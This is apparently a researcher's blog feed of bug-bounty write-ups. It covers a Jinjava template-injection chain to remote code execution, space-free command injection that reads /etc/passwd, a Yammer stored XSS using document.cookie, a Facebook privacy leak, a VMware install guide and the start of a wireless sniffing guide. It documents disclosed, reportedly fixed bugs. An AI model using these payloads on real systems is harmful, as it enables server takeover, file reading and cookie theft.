<span style="font-family: "courier new" , "courier" , monospace;">Payload: {{'a'.getClass().forName('javax.script.ScriptEngineManager').newInstance().getEngineFactories()[0].getLanguageName()}}</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">Output: ECMAScript</span><br />
<span style="font-family: "courier new" , "courier" , monospace;"><br /></span>
<span style="font-family: "helvetica neue" , "arial" , "helvetica" , sans-serif;">Get language version -</span><span style="font-family: "courier new" , "courier" , monospace;"> </span><br />
<span style="font-family: "courier new" , "courier" , monospace;">Payload: {{'a'.getClass().forName('javax.script.ScriptEngineManager').newInstance().getEngineFactories()[0].getLanguageVersion()}}</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">Output: ECMA - 262 Edition 5.1</span><br />
<span style="font-family: "courier new" , "courier" , monospace;"><br /></span>
<span style="font-family: "helvetica neue" , "arial" , "helvetica" , sans-serif;">Now go for the kill.</span><br />
<span style="font-family: "helvetica neue" , "arial" , "helvetica" , sans-serif;"><br /></span>
<span style="font-family: "helvetica neue" , "arial" , "helvetica" , sans-serif;">To get RCE using the ScriptEngineManager, you have to run the ever so useful "eval" method with some Java code thrown into it.</span><br />
<span style="font-family: "helvetica neue" , "arial" , "helvetica" , sans-serif;">After a lot of trial and errors, I finally got eval to work.</span><br />
<span style="font-family: "helvetica neue" , "arial" , "helvetica" , sans-serif;">Payload: </span><span style="font-family: "courier new" , "courier" , monospace;">{{'a'.getClass().forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('JavaScript').eval(\"new java.lang.String('xxx')\")}}</span><br />
<span style="font-family: "helvetica neue" , "arial" , "helvetica" , sans-serif;">Output: </span><span style="font-family: "courier new" , "courier" , monospace;">xxx</span><br />
<span style="font-family: "courier new" , "courier" , monospace;"><br /></span>
<span style="font-family: "helvetica neue" , "arial" , "helvetica" , sans-serif;">I successfully evaluated dynamic java code using ScriptEngineManager instance! </span><br />
<span style="font-family: "helvetica neue" , "arial" , "helvetica" , sans-serif;">Now I only need to substitute real code that will execute system commands and throw it into eval.</span><br />
<span style="font-family: "helvetica neue" , "arial" , "helvetica" , sans-serif;"><br /></span>
<span style="font-family: "helvetica neue" , "arial" , "helvetica" , sans-serif;">After another trial and error session, I finally had some success -</span><br />
<span style="font-family: "helvetica neue" , "arial" , "helvetica" , sans-serif;">Payload: </span><span style="font-family: "courier new" , "courier" , monospace;">{{'a'.getClass().forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('JavaScript').eval(\"var x=new java.lang.ProcessBuilder; x.command(\\\"whoami\\\"); x.start()\")}}</span><br />
<span style="font-family: "helvetica neue" , "arial" , "helvetica" , sans-serif;">Output: </span><span style="font-family: "courier new" , "courier" , monospace;">java.lang.UNIXProcess@1e5f456e</span><br />
<span style="font-family: "courier new" , "courier" , monospace;"><br /></span>
<span style="font-family: "helvetica neue" , "arial" , "helvetica" , sans-serif;">Woot! The output was a reference to a UNIXProcess object which means my command was successfully executed! I could have now ran a reverse shell command and obtained a shell but since I was able to see the output, I decided to push this a little more and get the command's output in response itself.</span><br />
<br />
<span style="font-family: "helvetica neue" , "arial" , "helvetica" , sans-serif;">Another frantic search session resulted with the discovery of <a href="https://commons.apache.org/proper/commons-io/javadocs/api-2.5/org/apache/commons/io/IOUtils.html" target="_blank">org.apache.commons.io.IOUtils</a>. This class provides static utility methods for input/output operations.</span><br />
<br />
<span style="font-family: "helvetica neue" , "arial" , "helvetica" , sans-serif;">My final payload was -</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">{{'a'.getClass().forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('JavaScript').eval(\"var x=new java.lang.ProcessBuilder; x.command(\\\"netstat\\\"); org.apache.commons.io.IOUtils.toString(x.start().getInputStream())\")}}</span><br />
<span style="font-family: "courier new" , "courier" , monospace;"><br /></span>
<span style="font-family: "helvetica neue" , "arial" , "helvetica" , sans-serif;">Output:</span><span style="font-family: "helvetica neue" , "arial" , "helvetica" , sans-serif;"> See for yourselves!</span><br />
<div>
<span style="font-family: "helvetica neue" , "arial" , "helvetica" , sans-serif;"><br /></span></div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://2.bp.blogspot.com/-fil_72ncQ0A/XAnwN-GUrZI/AAAAAAAAUOk/GsTCTH17lRAlw2ZlH5Zr99EwDDEy-ZjRgCEwYBhgL/s1600/netstat-output.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="1600" data-original-width="1583" height="640" src="https://2.bp.blogspot.com/-fil_72ncQ0A/XAnwN-GUrZI/AAAAAAAAUOk/GsTCTH17lRAlw2ZlH5Zr99EwDDEy-ZjRgCEwYBhgL/s640/netstat-output.png" width="632" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Bingpot!</td></tr>
</tbody></table>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<span style="font-family: "helvetica neue" , "arial" , "helvetica" , sans-serif;">It took me a few more tries to learn how to pass multiple arguments to the commands.</span><br />
<span style="font-family: "helvetica neue" , "arial" , "helvetica" , sans-serif;">Notice the x.command function! -</span><br />
<span style="font-family: "helvetica neue" , "arial" , "helvetica" , sans-serif;">Payload:</span><span style="font-family: "courier new" , "courier" , monospace;"> {{'a'.getClass().forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('JavaScript').eval(\"var x=new java.lang.ProcessBuilder; x.command(\\\"uname\\\",\\\"-a\\\"); org.apache.commons.io.IOUtils.toString(x.start().getInputStream())\")}}</span><br />
Output: <span style="font-family: "courier new" , "courier" , monospace;">Linux bumpy-puma 4.9.62-hs4.el6.x86_64 #1 SMP Fri Jun 1 03:00:47 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux\n</span><br />
<span style="font-family: "courier new" , "courier" , monospace;"><br /></span>
<span style="font-family: "helvetica neue" , "arial" , "helvetica" , sans-serif;">As you can imagine, it was quite a struggle but in the end I had a lot of fun and learnt a lot in the process. The Jinjava project was introduced by Hubspot back in <a href="https://product.hubspot.com/blog/jinjava-a-jinja-for-your-java" target="_blank">2014</a>, that means this bug had been around 4 years in nobody found it (hopefully). The Hubspot team was very receptive and fixed it very fast by disabling the "getClass" method on a variable. You can find the fix <a href="https://github.com/HubSpot/jinjava/pull/230" target="_blank">here</a>.</span><br />
<br />
<span style="font-family: "helvetica neue" , "arial" , "helvetica" , sans-serif;"><b>Bonus</b><br /><br />A couple of days after fixing the vulnerability, Hubspot informed me that since "<a href="https://github.com/HubSpot/jinjava">Jinjava</a>" - an open source project - is being used by many other companies apart from Hubspot, they have applied for a CVE and I will be credited in it for the discovery of this issue! Sweet!</span></div>
<div>
<span style="font-family: "helvetica neue" , "arial" , "helvetica" , sans-serif;"><br /></span>
<span style="font-family: "helvetica neue" , "arial" , "helvetica" , sans-serif;">References:</span><br />
<span style="font-family: "helvetica neue" , "arial" , "helvetica" , sans-serif;">1. <a href="https://srcincite.io/blog/2017/05/22/from-serialized-to-shell-auditing-google-web-toolkit-with-el-injection.html" target="_blank">https://srcincite.io/blog/2017/05/22/from-serialized-to-shell-auditing-google-web-toolkit-with-el-injection.html</a></span><br />
<span style="font-family: "helvetica neue" , "arial" , "helvetica" , sans-serif;">2. <a href="https://portswigger.net/blog/server-side-template-injection" target="_blank">https://portswigger.net/blog/server-side-template-injection</a> </span><br />
<span style="font-family: "helvetica neue" , "arial" , "helvetica" , sans-serif;">3. <a href="http://danamodio.com/appsec/research/spring-remote-code-with-expression-language-injection/" target="_blank">http://danamodio.com/appsec/research/spring-remote-code-with-expression-language-injection/</a></span><br />
4. <span style="font-family: "helvetica neue" , "arial" , "helvetica" , sans-serif;"><a href="https://blog.mindedsecurity.com/2015/11/reliable-os-shell-with-el-expression.html" target="_blank">https://blog.mindedsecurity.com/2015/11/reliable-os-shell-with-el-expression.html </a></span><br />
<span style="font-family: "helvetica neue" , "arial" , "helvetica" , sans-serif;"><br /></span></div>
</div>
</div>
Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-4538251661335272060.post-44211492414721028932016-10-02T13:31:00.001+05:302016-10-17T10:28:01.440+05:30Command Injection Without Spaces<div dir="ltr" style="text-align: left;" trbidi="on">
<span style="font-family: "verdana" , sans-serif;">I came across a nice little command injection vulnerability while doing a bug bounty recently. The only catch was that I couldn't use any spaces in the commands. Let me go into the details...</span><br />
<span style="font-family: "verdana" , sans-serif;"><br /></span>
<span style="font-family: "verdana" , sans-serif;">Note: I can't post any details about the application as it was a private bounty program.</span><br />
<span style="font-family: "verdana" , sans-serif;"><br /></span>
<span style="font-family: "verdana" , sans-serif;">It all began with the page providing an input box for doing 'nslookup' of a domain or IP entered by the user.</span><br />
<span style="font-family: "verdana" , sans-serif;">A page like this always excites a bug bounty hunter as the application has to pass user's input to underlying system command to perform nslookup and present the output of that command in the browser. If the developer has made any mistake in validating and sanitizing the input, they inadvertently open the doors to attackers misusing this feature to execute arbitrary commands on the server.</span><br />
<span style="font-family: "verdana" , sans-serif;"><br /></span>
<span style="font-family: "verdana" , sans-serif;">So, when I saw the input box I started to explore and try to force the application in executing arbitrary commands.</span><br />
<span style="font-family: "verdana" , sans-serif;">I began with simple input <span style="background-color: #fff2cc;">google.com</span></span><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://4.bp.blogspot.com/-Bbl2CTUpp2k/V_CxJCcH2WI/AAAAAAAAL9c/QWPUUcoqVrM2w0kth0gw46xrpfTBQlfVQCLcB/s1600/blog-1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><span style="font-family: "verdana" , sans-serif;"><img border="0" height="219" src="https://4.bp.blogspot.com/-Bbl2CTUpp2k/V_CxJCcH2WI/AAAAAAAAL9c/QWPUUcoqVrM2w0kth0gw46xrpfTBQlfVQCLcB/s640/blog-1.png" width="640" /></span></a></div>
<span style="font-family: "verdana" , sans-serif;"><br /></span>
<span style="font-family: "verdana" , sans-serif;">My next automatic try was to input <span style="background-color: #fff2cc;">google.com && ls</span></span><br />
<span style="font-family: "verdana" , sans-serif;">This returned same output as above, meaning the application ignored additional command provided by me. The same story continued for all my tries such as <span style="background-color: #fff2cc;">google.com || ls</span></span><br />
<span style="font-family: "verdana" , sans-serif;">When I tried input <span style="background-color: #fff2cc;">google.com>/tmp/test.txt</span> the output window came blank which was strange. This suggested maybe the application is filtering spaces so I tried the same commands but without spaces and...</span><br />
<div>
<span style="font-family: "verdana" , sans-serif;"><br /></span></div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="http://2.bp.blogspot.com/-0b9y547OHYs/V_Cz8b9SlFI/AAAAAAAAL9s/MUKMoYRX4Z0XSS81s2StCrWPyWHcva7_ACK4B/s1600/blog-2.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><span style="font-family: "verdana" , sans-serif;"><img border="0" height="216" src="https://2.bp.blogspot.com/-0b9y547OHYs/V_Cz8b9SlFI/AAAAAAAAL9s/MUKMoYRX4Z0XSS81s2StCrWPyWHcva7_ACK4B/s640/blog-2.png" width="640" /></span></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><span style="font-family: "verdana" , sans-serif;">Success!</span></td></tr>
</tbody></table>
<span style="font-family: "verdana" , sans-serif;">But the problem with spaces was still not solved. For the input <span style="background-color: #fff2cc;">google.com&&cat /etc/passwd</span> the application again ignored anything after the space.</span><br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="http://4.bp.blogspot.com/-5HEp8oXbF0g/V_C9n3S-rjI/AAAAAAAAL-o/mCmevY3T8Bw6pbW9bV1ana7es5ovSAlxwCK4B/s1600/blog-3.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><span style="font-family: "verdana" , sans-serif;"><img border="0" height="225" src="https://4.bp.blogspot.com/-5HEp8oXbF0g/V_C9n3S-rjI/AAAAAAAAL-o/mCmevY3T8Bw6pbW9bV1ana7es5ovSAlxwCK4B/s640/blog-3.png" width="640" /></span></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><span style="font-family: "verdana" , sans-serif;">:(</span></td></tr>
</tbody></table>
<div>
<span style="font-family: "verdana" , sans-serif;">Then my next obvious move was to search on Google for this issue because if I am facing this issue, somebody must have already faced similar situation. Needless to say, Google didn't disappoint.</span><br />
<div>
<div>
<span style="font-family: "verdana" , sans-serif;"><br /></span></div>
<div>
<span style="font-family: "verdana" , sans-serif;">Enter "<a href="https://jon.oberheide.org/blog/2008/09/04/bash-brace-expansion-cleverness/" target="_blank">Bash Brace Expansion</a>". </span></div>
<div>
<span style="font-family: "verdana" , sans-serif;">According to this, if you provide input like following on the bash terminal: <span style="background-color: #fff2cc;">{echo,hello,world}</span> it will execute the command <span style="background-color: #fff2cc;">echo hello world</span></span><br />
<div>
<span style="font-family: "verdana" , sans-serif;">That was neat and TIL moment for me.</span></div>
<div>
<span style="font-family: "verdana" , sans-serif;">I tried it in my application but that didn't succeed. Maybe because the application I was targeting was an embedded device and the shell was a busybox shell. On more Googling, my doubt was <a href="http://lists.busybox.net/pipermail/busybox/2011-July/076170.html" target="_blank">confirmed</a>.</span></div>
<div>
<span style="font-family: "verdana" , sans-serif;"><br /></span>
<span style="font-family: "verdana" , sans-serif;">So I was again back to Google looking for different solution. Then I came across this thread - <a href="http://seclists.org/pauldotcom/2012/q2/200">http://seclists.org/pauldotcom/2012/q2/200</a></span></div>
<div>
<span style="font-family: "verdana" , sans-serif;">According to this, you can execute commands without spaces like this: <span style="background-color: #fff2cc;">CMD=$'\x20a\x20b\x20c';echo$CMD</span></span></div>
<div>
<span style="font-family: "verdana" , sans-serif;"><br /></span></div>
<div>
<div>
<span style="font-family: "verdana" , sans-serif;">Look at the cleverness of that! More TIL!</span></div>
</div>
</div>
</div>
<div>
<span style="font-family: "verdana" , sans-serif;">Here, CMD is an environment variable containing encoded spaces. On running that we get <span style="background-color: #fff2cc;">echo a b c</span></span></div>
<div>
<span style="font-family: "verdana" , sans-serif;"><br /></span></div>
<div>
<span style="font-family: "verdana" , sans-serif;">Now, I tried that in my application with little modification<span style="background-color: #fff2cc;"> CMD=$'\x20a\x20b\x20c'&&echo$CMD</span></span></div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="http://1.bp.blogspot.com/-atd0pG_Iq68/V_C9Nc8JxdI/AAAAAAAAL-c/wMQrVhYk3Lg4daGjV7sPFv1gPx9xAyA1QCK4B/s1600/blog-4.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><span style="font-family: "verdana" , sans-serif;"><img border="0" height="216" src="https://1.bp.blogspot.com/-atd0pG_Iq68/V_C9Nc8JxdI/AAAAAAAAL-c/wMQrVhYk3Lg4daGjV7sPFv1gPx9xAyA1QCK4B/s640/blog-4.png" width="640" /></span></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><span style="font-family: "verdana" , sans-serif;">Bingo!</span></td></tr>
</tbody></table>
<div>
<span style="font-family: "verdana" , sans-serif;"><br /></span></div>
<span style="font-family: "verdana" , sans-serif;">From here, executing arbitrary commands was a cakewalk. Input <span style="background-color: #fff2cc;">google.com&&CMD=$'\x20/etc/passwd'&&cat$CMD</span></span><br />
<div>
<div>
<span style="font-family: "verdana" , sans-serif;"><br /></span>
<br />
<div>
<span style="font-family: "verdana" , sans-serif;"><br /></span></div>
<div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="http://1.bp.blogspot.com/-KJV6HIUHxjE/V_DB-AZWB8I/AAAAAAAAL-4/evXEa9XaCBw1OSgzUCwkxgCiyBb_KlpcwCK4B/s1600/blog-5.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="218" src="https://1.bp.blogspot.com/-KJV6HIUHxjE/V_DB-AZWB8I/AAAAAAAAL-4/evXEa9XaCBw1OSgzUCwkxgCiyBb_KlpcwCK4B/s640/blog-5.png" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">/etc/passwd</td></tr>
</tbody></table>
<br /></div>
</div>
</div>
</div>
</div>
Unknownnoreply@blogger.com3tag:blogger.com,1999:blog-4538251661335272060.post-40277675189961688622014-12-12T09:46:00.001+05:302014-12-12T09:46:40.827+05:30Curious case of Yammer XSS<div dir="ltr" style="text-align: left;" trbidi="on">
<span style="font-family: Verdana, sans-serif;">Microsoft recently (finally!!) started with their <a href="http://technet.microsoft.com/en-us/security/dn800983" rel="nofollow" target="_blank">bug bounty program</a> for some of the online services. Yammer is part of its scope. Noticing this I jumped on to find bugs in Yammer because it looked to be the easier of the targets. This post is about a strange stored XSS I found in Yammer apps which would have allowed non-admin users to steal cookies from admin users and also do other nasty stuff.</span><br />
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Verdana, sans-serif;">To begin with, Yammer is a private social network that helps employees collaborate across departments, locations and business apps. </span><br />
<br />
<span style="font-family: Verdana, sans-serif;">Once logged in to Yammer, any user can create and publish apps to the organization's Apps directory. This process does not require authorizations or approvals. Apps are published to the app directory some time after it is created.</span><br />
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Verdana, sans-serif;">Apps can be created from https://www.yammer.com/client_applications.</span><br />
<span style="font-family: Verdana, sans-serif;">When registering the app, Yammer takes in Redirect URI value which is "the URL to redirect the user's browser to after the user has linked the application to their Yammer account"</span><br />
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Verdana, sans-serif;">I put<b> javascript:alert(document.cookie)//</b> as the redirect URI.</span><br />
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Verdana, sans-serif;">In such cases, browser does a 302 redirect to this Redirect URI. Due of security measures in browsers, it is not generally possible to abuse 302 redirects for XSS by redirecting to javascript or data URIs. Browsers won't redirect to javascript URIs even if it is in the Location header of the response. </span><br />
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Verdana, sans-serif;">In case of Yammer, something strange was happening. When a user tried to use the app in Internet Explorer, browser was properly doing a 302 redirect hence blocking my javascript but in Chrome and Firefox, a 200 OK response was returned with my redirect URI in response body. The browser would then try to load that URI and BINGO!! Javascript executed successfully!</span><br />
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Verdana, sans-serif;">Watch the video below for complete demonstration of attack.</span><br />
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /><iframe allowfullscreen='allowfullscreen' webkitallowfullscreen='webkitallowfullscreen' mozallowfullscreen='mozallowfullscreen' width='320' height='266' src='https://www.youtube.com/embed/bETAtuPteO4?feature=player_embedded' frameborder='0'></iframe></div>
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Verdana, sans-serif;">(I originally recorded the video in swf and now I couldn't find a decent swf to video converter so I recorded the video of the video :-D)</span><br />
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Verdana, sans-serif;">Microsoft fixed this issue pretty quickly and also added my name to the <a href="http://technet.microsoft.com/en-us/security/dn469163" target="_blank">Bounty Honor Roll</a>. Thats all for now. Over n out.</span></div>
Unknownnoreply@blogger.com1tag:blogger.com,1999:blog-4538251661335272060.post-68634665160642753572013-12-24T21:30:00.003+05:302014-12-10T22:16:54.920+05:30Facebook, Only Me... really??<div dir="ltr" style="text-align: left;" trbidi="on">
<span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;">In my quest for finding bugs on the internet in my free time, I stumbled upon some information disclosure / privacy settings violation issues on Facebook and reported them promptly (after 2 months of discovery :P). Facebook took them seriously and responded promptly (again 1~2 months after the report) and fixed one of them. This entry describes how anyone could find out the information which you have entered in your profile but kept it hidden (Privacy settings == Only Me) just by becoming your friend. </span><br />
<span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;"><br /></span>
<span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;">This is going to be the lamest / non-technical bug you are ever going to see. So brace yourself.</span><br />
<span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;"><br /></span>
<span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;">First, the victim has to set the information which he doesn't want to disclose with privacy settings as "Only Me".</span><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://1.bp.blogspot.com/-ZnfnXNoAJH0/UpA7x1LIL1I/AAAAAAAADqE/knZ_TK7Pr7Q/s1600/2-1.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://1.bp.blogspot.com/-ZnfnXNoAJH0/UpA7x1LIL1I/AAAAAAAADqE/knZ_TK7Pr7Q/s1600/2-1.PNG" height="240" width="640" /></a></div>
<br />
<span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;">Second, The attacker adds the victim as a friend. Remember, for this "attack" to work, the victim has to be the only friend in attackers friends list. Either the attacker creates a new profile and adds victim as a friend or unfriends all the friends but the victim, anything can work.</span><br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://2.bp.blogspot.com/-MBpX-kiR9uQ/UpA_AxroIXI/AAAAAAAADqQ/L__R5Bk5Cdg/s1600/2+-+2.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://2.bp.blogspot.com/-MBpX-kiR9uQ/UpA_AxroIXI/AAAAAAAADqQ/L__R5Bk5Cdg/s1600/2+-+2.PNG" height="320" width="640" /></a></div>
<br />
<span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;">Third, attacker goes to update his profile. When he clicks on the textbox to enter the information, Facebook, trying to be helpful, conveniently displays suggestions which are nothing but the values which victim has entered and kept private even from his friends. TADA! Privacy violations!!</span><br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://3.bp.blogspot.com/-8ooJFdYm3Cs/UpBAy6fGSBI/AAAAAAAADqc/f9pALtoe-2Q/s1600/2-3.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://3.bp.blogspot.com/-8ooJFdYm3Cs/UpBAy6fGSBI/AAAAAAAADqc/f9pALtoe-2Q/s1600/2-3.PNG" height="340" width="640" /></a></div>
<br />
<span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;"><br /></span>
<span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;">Sometimes being helpful does not mean being nice. </span><br />
<span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;"><br /></span>
<span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;">No matter how lame, it was privacy violation. Facebook accepted it and fixed it. Kudos to them. No such helpful suggestions are shown if your privacy settings are set to "Only Me".</span><br />
<br /></div>
Unknownnoreply@blogger.com1tag:blogger.com,1999:blog-4538251661335272060.post-2110544723249600742013-07-28T03:09:00.000+05:302013-07-28T03:15:15.110+05:30Installing VMWare Player / Workstation on Kali Linux<div dir="ltr" style="text-align: left;" trbidi="on">
<span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;">This guide is for installing VMware Player or Workstation on Kali Linux. Although this is a simple task, I faced an issue with the kernel headers when launching VMware Player, hence this blog post.</span><br />
<span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;"><br /></span>
<span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;">I did these steps with VMware Player but same steps can be followed for Workstation.</span><br />
<span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;"><br /></span>
<span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;">1. First of all, download the VMware Player from <a href="https://my.vmware.com/web/vmware/free#desktop_end_user_computing/vmware_player/5_0">https://my.vmware.com/web/vmware/free#desktop_end_user_computing/vmware_player/5_0</a></span><br />
<span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;"><br /></span>
<span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;">2. Make the downloaded file executable by navigating to the directory where you downloaded the bundle and execute:</span><br />
<span style="background-color: #eeeeee; font-family: Courier New, Courier, monospace;">chmod +x VMware-Player-5.0.1-894247.x86_64.bundle</span><br />
<span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;"><br /></span>
<span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;">3. Open Terminal and install the packages needed by VMware Player</span><br />
<div>
<span style="background-color: #eeeeee; font-family: Courier New, Courier, monospace;">apt-get install build-essential linux-headers-`uname -r`</span></div>
<span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;">This will install the kernel headers of your current Linux kernel version.<br /><br />4.After packages are installed, start the VMware Player installer</span><br />
<div>
<span style="background-color: #eeeeee; font-family: Courier New, Courier, monospace;">./VMware-Player-5.0.1-894247.x86_64.bundle</span></div>
<span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;">This is pretty much it.</span><br />
<div>
<span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;">5.Launch the VMware Player by navigating to it from the main menu.</span><br />
<div>
<span style="background-color: #cccccc;"><span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;"><br /></span></span></div>
<span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;">At this stage, I got an error saying that "Kernel headers for kernel version 3.7-trunk-amd64 could not be found."</span><br />
<div>
<span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;">That was strange, because I had the kernel headers for this version already installed.<br /><br />After a little looking around, I found the solution.<br />To solve this issue, do the following steps:</span><br />
<div style="text-align: left;">
<span style="background-color: #eeeeee; font-family: Courier New, Courier, monospace;">cd /lib/modules/$(uname -r)/build/include/linux </span></div>
<div style="text-align: left;">
<span style="background-color: #eeeeee; font-family: Courier New, Courier, monospace;">sudo ln -s ../generated/utsrelease.h</span></div>
<div style="text-align: left;">
<span style="background-color: #eeeeee; font-family: Courier New, Courier, monospace;">sudo ln -s ../generated/autoconf.h</span></div>
<div style="text-align: left;">
<span style="background-color: #eeeeee; font-family: Courier New, Courier, monospace;">sudo ln -s ../generated/uapi/linux/version.h</span></div>
<div>
<span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;">Hopefully someone will find this solution useful.</span></div>
</div>
</div>
</div>
Unknownnoreply@blogger.com18tag:blogger.com,1999:blog-4538251661335272060.post-20716189930005438752013-04-12T21:31:00.000+05:302013-04-12T21:31:37.509+05:30Passively Monitoring Network Traffic On Wireless Networks<b id="internal-source-marker_0.507105850847438" style="font-weight: normal;"></b><br />
<div dir="ltr" style="line-height: 1.1500000000000001; margin-bottom: 10pt; margin-top: 0pt;">
<b id="internal-source-marker_0.507105850847438" style="font-weight: normal;"><span style="font-family: Calibri; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">Many times, during penetration tests, we have to monitor the data flowing inside the network. Achieving this on an Ethernet network is simple as we can just connect a network cable and be a part of the target network. But that makes us accountable and someone from the network can find out that someone is monitoring the traffic.</span></b></div>
<div dir="ltr" style="line-height: 1.1500000000000001; margin-bottom: 10pt; margin-top: 0pt;">
<b id="internal-source-marker_0.507105850847438" style="font-weight: normal;"><span style="font-family: Calibri; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">In wireless networks, we have an advantage of monitoring the network traffic passively. The packets are freely flowing over the air and we just need to be able to see them.</span></b></div>
<div dir="ltr" style="line-height: 1.1500000000000001; margin-bottom: 10pt; margin-top: 0pt;">
<b id="internal-source-marker_0.507105850847438" style="font-weight: normal;"><span style="font-family: Calibri; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">To be able to monitor network traffic, we must put our wireless adapter in Monitor mode.</span></b></div>
<div dir="ltr" style="line-height: 1.1500000000000001; margin-bottom: 10pt; margin-top: 0pt;">
<b id="internal-source-marker_0.507105850847438" style="font-weight: normal;"><span style="font-family: Calibri; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">airmon-ng start wlan0</span></b></div>
<div dir="ltr" style="line-height: 1.1500000000000001; margin-bottom: 10pt; margin-top: 0pt;">
<b id="internal-source-marker_0.507105850847438" style="font-weight: normal;"><span style="font-family: Calibri; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">This will start the monitor mode on a virtual interface such as “mon0”</span><img height="89px;" src="https://lh4.googleusercontent.com/5sKanJDtbG5s9ur8ipzJpVMNzsRt3JXY8sjYOZmwlFPiSoMI4Irf4fZPoizSQS0hLZYIjj9YuDfDQWqQfL_eSu6q4C93mplimhxcI8HmET1Y5_rB70-aQPTG" width="456px;" /><span style="font-family: Calibri; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;"></span></b></div>
<div dir="ltr" style="line-height: 1.1500000000000001; margin-bottom: 10pt; margin-top: 0pt;">
<b id="internal-source-marker_0.507105850847438" style="font-weight: normal;"><span style="font-family: Calibri; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">To start dumping data from the target network, we need to know following things:</span></b></div>
<b id="internal-source-marker_0.507105850847438" style="font-weight: normal;"><br /><ol style="margin-bottom: 0pt; margin-top: 0pt;">
<li dir="ltr" style="font-family: Arial; font-size: 15px; list-style-type: decimal; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.1500000000000001; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: Calibri; vertical-align: baseline; white-space: pre-wrap;">BSSID – MAC address of the Access Point</span></div>
</li>
